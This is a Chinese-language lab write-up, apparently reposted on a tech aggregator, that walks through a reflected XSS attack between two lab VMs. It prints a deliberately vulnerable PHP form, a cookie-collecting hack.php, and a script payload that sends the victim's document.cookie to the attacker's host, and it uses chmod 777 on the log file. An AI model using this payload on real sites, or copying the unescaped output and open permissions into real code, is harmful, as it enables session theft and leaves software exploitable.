跨站脚本攻击XSS (cross site scripting)

编程入门 行业动态 更新时间:2024-10-26 10:41:13

跨站<a href=https://www.elefans.com/category/jswz/34/1771291.html style=脚本攻击XSS (cross site scripting)"/>

跨站脚本攻击XSS (cross site scripting)

跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。

实验目的

进行一个xss跨站脚本攻击,获取目标的IP和Cookie信息。

实验环境

桥接模式下的KALI、物理机或者同NAT模式下的两台虚拟机

实验过程

1.在KALi的网站目录下创建两个php文件

       (1) submit.php

<?php
session_start();
?>
<!doctype html>
<html><head><title>XSS Demo</title></head><body><form><input style="width:300px;" type="text" name="address1" value="<?php echo $_GET["address1"]; ?>" /><input type="submit" value="submit" /></form></body>
</html>

        (2)hack.php

<?php
$victim = 'XXS get the cookie:'. $_SERVER['REMOTE_ADDR']. ':' .$_GET['cookie'];
file_put_contents("1.txt", "$victim");
echo welcome;
?>

保存好放入/var/www/html目录下

2.进入网站提交恶意代码

 (1)打开kali的apache服务

service apache2 start

 (2)在网页测试一下是否开启服务也可以通过nmap扫描自己的端口判断

3.进入http://192.168.x.x/submit.php,在输入框中输入恶意的代码

(1)在此之前先修改一下浏览器的安全设置

        

(2)提交恶意代码

"/> <script>window.open("http://192.168.2.123/hack.php?cookie="+document.cookie);        </script><!--  

4.提交之后跳转进入hack.php

(1)到1.txt查看是否写入受害者的IP和Cookie

(2)这里并没有写入,分析原因:代码检查过了一遍没有问题,安全设置也设置了,那么可能的原因就是文件写入权限的问题。

(3)解决办法,打kali终端输入

cd /var/www/html    #进入网站目录ls -ll               #查看文件权限chmod 777 /var/www/html/1.txt      #修改1.txt文件的权限

这样写入问题解决。

5.打开1.txt文件查看到受害者的IP和Cookie信息

实验完毕

更多推荐

跨站脚本攻击XSS (cross site scripting)

本文发布于:2024-03-15 11:52:34,感谢您对本站的认可!
本文链接:https://www.elefans.com/category/jswz/34/1738828.html
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。
本文标签:脚本   XSS   cross   site   scripting

发布评论

评论列表 (有 0 条评论)
草根站长

>www.elefans.com

编程频道|电子爱好者 - 技术资讯及电子产品介绍!